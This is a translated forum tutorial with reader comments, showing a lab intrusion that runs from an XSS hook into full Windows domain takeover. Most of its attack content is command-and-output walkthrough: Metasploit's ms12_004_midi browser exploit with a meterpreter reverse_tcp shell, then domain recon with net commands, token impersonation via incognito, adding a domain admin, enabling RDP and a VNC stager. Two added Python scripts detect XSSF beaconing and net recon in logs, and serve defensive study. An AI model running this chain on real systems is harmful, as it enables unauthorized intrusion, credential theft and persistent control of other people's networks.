XSS penetration: a beginner's domain intrusion
Author: j8g
Note: first published by 0xSafe Team
Please credit the above when reposting.
【0x01】Preparation
【0x02】Configuring XSSF
【0x03】Conclusion
Body:
1. Preparation
Before we start, we boot into the Ubuntu system
or enter
This takes a while.
If startup fails, check this configuration file; the configuration details are in it (path + file).
Next you see this.
Download it here: https://code.google.com/p/xssf/downloads/list
As shown below, cp it into msf3.
msf > xssf_urls // the default addresses
[+] XSSF Server : 'http://192.168.1.109:8888/' or 'http://<PUBLIC-IP>:8888/'
[+] Generic XSS injection: 'http://192.168.1.109:8888/loop' or 'http://<PUBLIC-IP>:8888/loop'
[+] XSSF test page : 'http://192.168.1.109:8888/test.html' or 'http://<PUBLIC-IP>:8888/test.html'
[+] XSSF Tunnel Proxy : 'localhost:8889' // proxy
[+] XSSF logs page : 'http://localhost:8889/gui.html?guipage=main' // XSSF page
[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
[+] XSSF help page : 'http://localhost:8889/gui.html?guipage=help'
Let's open the XSSF GUI log page and take a look.
Right now there are no XSS-hooked machines.
Then look at the result.
msf > xssf_victims
Victims
=======
id xssf_server_id active ip interval browser_name browser_version cookie
-- -------------- ------ -- -------- ------------ --------------- ------
3 2 true 192.168.1.104 5 Internet Explorer 6.0 NO
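The xssf_urls output and the victims table above show what a hooked browser looks like from the server side: the injected script keeps polling the framework's /loop URL at a fixed interval (5 seconds for victim 3). The detection script below is an added example, not part of the original post or of XSSF; it reads constructed proxy-log lines (the "epoch client method url" layout is an assumption) and flags any client polling one URL at near-constant intervals, which also catches beacons that use a different path.

```python
"""Flag XSSF-style beaconing in web proxy logs: a hooked browser re-requests
the framework's polling URL (/loop in the xssf_urls output) every few seconds,
so one client hitting one URL at near-constant intervals is the artefact."""
import re
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample proxy lines, "epoch client method url" (not real traffic).
SAMPLE_LOG = """\
1358925600 10.0.0.7 GET http://192.168.1.109:8888/loop
1358925605 10.0.0.7 GET http://192.168.1.109:8888/loop
1358925610 10.0.0.7 GET http://192.168.1.109:8888/loop
1358925615 10.0.0.7 GET http://192.168.1.109:8888/loop
1358925620 10.0.0.7 GET http://192.168.1.109:8888/loop
1358925603 10.0.0.9 GET http://intranet.example/news
1358925640 10.0.0.9 GET http://intranet.example/news
1358925641 10.0.0.9 GET http://intranet.example/style.css
1358925702 10.0.0.9 GET http://intranet.example/news
1358925780 10.0.0.9 GET http://intranet.example/news
"""

LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+)$")

def parse(log_text):
    """Group request timestamps by (client, url); malformed lines are skipped."""
    series = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, _method, url = m.groups()
            series[(client, url)].append(int(ts))
    return series

def find_beacons(log_text, min_hits=4, max_jitter=0.2):
    """Return [(client, url, interval_seconds)] for every (client, url) pair
    with at least min_hits requests whose inter-request gaps have a relative
    spread (stdev / mean) below max_jitter, i.e. near-constant timing."""
    hits = []
    for (client, url), stamps in parse(log_text).items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg < max_jitter:
            hits.append((client, url, round(avg)))
    return hits
```

The second client in the sample visits the same page four times but at irregular gaps, so only the 5-second poller is reported.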
Next, let's pop an alert.
msf > use auxiliary/xssf/public/misc/alert
msf auxiliary(alert) > show options
Module options (auxiliary/xssf/public/misc/alert):
Name Current Setting Required Description
---- --------------- -------- -----------
AlertMessage XSSF ALERT ! yes Message you want to send to the victim.
SRVHOST 192.168.1.109 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VictimIDs ALL yes IDs of the victims you want to receive the code.\nExamples : 1, 3-5 / ALL / NONE
msf auxiliary(alert) > run
Auxiliary module execution started, press [CTRL + C] to stop it !
Using URL: http://192.168.1.109:8080/9ERUPi
[+] Remaining victims to attack: [3 (1)]
[+] Code 'auxiliary/xssf/public/misc/alert' sent to victim '3'
[+] Remaining victims to attack: NONE
This is what it looks like. Let's continue to the next step: planting the XSS trojan.
Next we use xssf_exploit to get a shell.
msf exploit(ms11_050_mshtml_cobjectelement) > use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > show options
Module options (exploit/windows/browser/ms12_004_midi):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms12_004_midi) > set SRVHOST 192.168.1.109
SRVHOST => 192.168.1.109
msf exploit(ms12_004_midi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms12_004_midi) > show options
Module options (exploit/windows/browser/ms12_004_midi):
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 192.168.1.109 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms12_004_midi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(ms12_004_midi) > exploit
Exploit running as background job.
[-] Handler failed to bind to 192.168.1.109:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:4444).
msf exploit(ms12_004_midi) > set LPORT 4321
LPORT => 4321
msf exploit(ms12_004_midi) > exploit
Exploit running as background job.
Started reverse handler on 192.168.1.109:4321
Using URL: http://192.168.1.109:8080/2lGeYy
Server started.
msf exploit(ms12_004_midi) >
We use the ms12_004_midi exploit.
The known jobs are:
msf exploit(ms12_004_midi) > jobs
Jobs
====
Id Name
-- ----
0 Exploit: windows/browser/ms11_050_mshtml_cobjectelement
2 Exploit: windows/browser/ms12_004_midi
Next comes:
3 stands for the xssf_victim id and 2 for the job number.
OK, we have a shell.
Look at the log:
Everything that ran and everything that was loaded is in there.
^C[-] Exploit interrupted by the console user
msf exploit(ms12_004_midi) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 9SEC\Administrator @ C0DEPAY-XP 192.168.1.109:4321 -> 192.168.1.104:8077 (192.168.128.130)
msf exploit(ms12_004_midi) > sessions -i 1
Starting interaction with 1...
meterpreter >
Got a shell.
Get the system hashes; they can be cracked on this site:
http://www.objectif-securite.ch/en/ophcrack.php
Enter the system
and look at the machines on the network.
C:\Documents and Settings\Administrator.9SEC\桌面>cd \
cd \
C:\>net view
net view
服务器名称            注释
-------------------------------------------------------------------------------
\\AAA
\\BBB
\\C0DEPAY-XP
\\YHZR
命令成功完成。
Let's see whether a domain exists!
C:\>net view /domain
Domain
----------------------------
9SEC
命令成功完成。
A domain exists. OK, let's continue with how to penetrate the domain. IP addresses, MAC addresses and the gateway are all visible.
Keep looking.
Check the ARP cache for associated IPs:
C:\>arp -a
arp -a
Interface: 192.168.128.130 --- 0x2
Internet Address Physical Address Type
192.168.128.2 00-50-56-f7-13-c5 dynamic
192.168.128.3 00-0c-29-49-10-a6 dynamic
It isn't only these; there are more. Let's look further.
Look at the domain administrators:
C:\>net localgroup administrators
net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
9SEC\Domain Admins
Administrator
命令成功完成。
C:\>
Let's enable 3389, or log in via VNC.
meterpreter > run getgui -e
Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
Carlos Perez [email protected]
Enabling Remote Desktop
RDP is disabled; enabling it ...
Setting Terminal Services service startup mode
The Terminal Services service is not set to auto, changing it to auto ...
Opening port in local firewall if necessary
For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20130123.0735.rc
meterpreter >
3389 is enabled; let's connect.
We can run net stop sharedaccess to turn off the firewall, then enable VNC.
Next, to look at the other machines, we use
C:\>net view
net view
服务器名称            注释
-------------------------------------------------------------------------------
\\AAA
\\BBB
\\C0DEPAY-XP
\\YHZR
命令成功完成。
to get the machine names.
BBB's IP address is obtained the same way:
192.168.128.3 \\AAA
192.168.128.4 \\BBB
192.168.128.130 \\C0DEPAY-XP
192.168.128.6 \\YHZR
OK, we have all the IPs.
Next, get the users in the domain:
C:\Documents and Settings\Administrator.9SEC\桌面>net user /domain
net user /domain
这项请求将在域 9sec.com 的域控制器处理。
\\AAA.9sec.com 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest IUSR_AAA
IWAM_AAA krbtgt SUPPORT_388945a0
swg
命令成功完成。
Get the groups in the domain:
C:\Documents and Settings\Administrator.9SEC\桌面>net group "domain admins" /domain
net group /domain
这项请求将在域 9sec.com 的域控制器处理。
Administrator
命令成功完成。
Get the administrators in the domain:
C:\Documents and Settings\Administrator.9SEC\桌面>net localgroup administrators /domain
net localgroup administrators /domain
这项请求将在域 9sec.com 的域控制器处理。
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
命令成功完成。
C:\Documents and Settings\Administrator.9SEC\桌面>
Then comes the next step of the intrusion.
use incognito
Load the incognito extension (used to steal tokens from the target host or impersonate users).
meterpreter > use incognito
Loading extension incognito...success.
meterpreter >
list_tokens -u
List the available user tokens on the target host.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
9SEC\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
And then,
impersonate_token DOMAIN_NAME\\USERNAME
impersonates an available token on the target host.
It worked.
OK...
A domain administrator has been added.
Log into this machine
and this appears,
because the newly added account isn't added in by default; we can do this...
C:\Documents and Settings\Administrator.9SEC\桌面>net localgroup administrators admin /add /domain
net localgroup administrators admin /add /domain
这项请求将在域 9sec.com 的域控制器处理。
发生系统错误 1378。
指定的帐户名已经是本地组的成员。
C:\Documents and Settings\Administrator.9SEC\桌面>net localgroup "Remote Desktop Users" admin /add /domain
net localgroup "Remote Desktop Users" admin /add /domain
这项请求将在域 9sec.com 的域控制器处理。
命令成功完成。
C:\Documents and Settings\Administrator.9SEC\桌面>exit
exit
[-] core_channel_write: Operation failed: The handle is invalid.
meterpreter > run vnc
Creating a VNC reverse tcp stager: LHOST=192.168.1.109 LPORT=4545)
Running payload handler
VNC stager executable 73802 bytes long
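The net view / net user / net group / net localgroup ... /domain enumeration above, and the net localgroup ... /add /domain group changes that follow it, leave a recognisable trail in process-creation logging (Windows event 4688 with command-line auditing, or Sysmon event 1). The scoring script below is an added example, not from the original post; it assumes the events were exported as constructed "timestamp host user commandline" lines, and the rule names, weights and threshold are illustrative.

```python
"""Score Windows process-creation telemetry for the domain recon chain shown
above (net view/user/group/localgroup ... /domain) and the group-membership
changes made with net localgroup ... /add /domain."""
import re
from collections import defaultdict

# Constructed sample events, "timestamp host user commandline" (not real telemetry).
SAMPLE_EVENTS = r"""
2013-01-23T07:30:01 C0DEPAY-XP 9SEC\Administrator net view /domain
2013-01-23T07:30:20 C0DEPAY-XP 9SEC\Administrator arp -a
2013-01-23T07:31:02 C0DEPAY-XP 9SEC\Administrator net user /domain
2013-01-23T07:31:40 C0DEPAY-XP 9SEC\Administrator net group "domain admins" /domain
2013-01-23T07:32:10 C0DEPAY-XP 9SEC\Administrator net localgroup administrators /domain
2013-01-23T07:33:05 C0DEPAY-XP 9SEC\Administrator net localgroup administrators admin /add /domain
2013-01-23T07:33:30 C0DEPAY-XP 9SEC\Administrator net localgroup "Remote Desktop Users" admin /add /domain
2013-01-23T07:40:00 YHZR 9SEC\swg net use \\AAA\share
"""

# (rule name, pattern over the command line, weight). Weights are illustrative;
# a single /add /domain is weighted to reach the alert threshold on its own.
RULES = [
    ("net_view_domain", re.compile(r"^net\s+view\s+/domain", re.I), 1),
    ("net_user_domain", re.compile(r"^net\s+user\s+/domain", re.I), 1),
    ("net_group_domain_admins", re.compile(r'^net\s+group\s+"?domain admins"?\s+/domain', re.I), 2),
    ("net_localgroup_domain", re.compile(r"^net\s+localgroup\s+\S+\s+/domain", re.I), 1),
    ("arp_cache_dump", re.compile(r"^arp\s+-a\b", re.I), 1),
    ("group_member_added", re.compile(r"^net\s+localgroup\s+.+\s+/add\s+/domain", re.I), 5),
]

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.+)$")

def score_hosts(events_text):
    """Return {host: (score, [matched rule names])} for hosts matching any rule."""
    totals = defaultdict(int)
    matched = defaultdict(list)
    for line in events_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, host, _user, cmdline = m.groups()
        for name, pattern, weight in RULES:
            if pattern.search(cmdline):
                totals[host] += weight
                matched[host].append(name)
    return {host: (totals[host], matched[host]) for host in totals}

def flagged_hosts(events_text, threshold=5):
    """Hosts whose accumulated recon/persistence score reaches the threshold."""
    return sorted(h for h, (score, _) in score_hosts(events_text).items() if score >= threshold)
```

The sample's second host only maps a share and matches no rule, so it never appears in the results.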
Look again:
another machine in the domain,
all the machines in the domain.
How do you tell which one is the domain controller? Look at the DNS Servers.
3. Conclusion
That's the end of the XSSF article. There are still some weak spots in it; I hope you'll point them out.
45 comments
Feels a bit like wishful thinking...
Thanks. With pictures and text it's much easier to learn now.
incognito is still really handy
Someone who doesn't understand XSS, passing by.
Good article. But reality is always cruel
Not bad, loading an IE MS vulnerability directly through XSS and taking out the admin's machine. Then you have everything.
Thanks for sharing, nice article.
All you gurus, please post more tutorials
Learning the approach
More theory than practice; there are too few machines fully exposed on the public Internet. Still a classic as teaching material.
Noting this for study
So XSS can be played like this too...
Thanks for sharing
XSS is just one way to attack the PC, the penetration comes afterwards; MSF is really powerful though
Kind of tiring to read
Idealized, but it works as an introductory piece
Marking this, will study it carefully~
A bit of a hassle to use. You have to set up the framework yourself.
Very detailed, thanks OP..
Without a 0day, what's the point...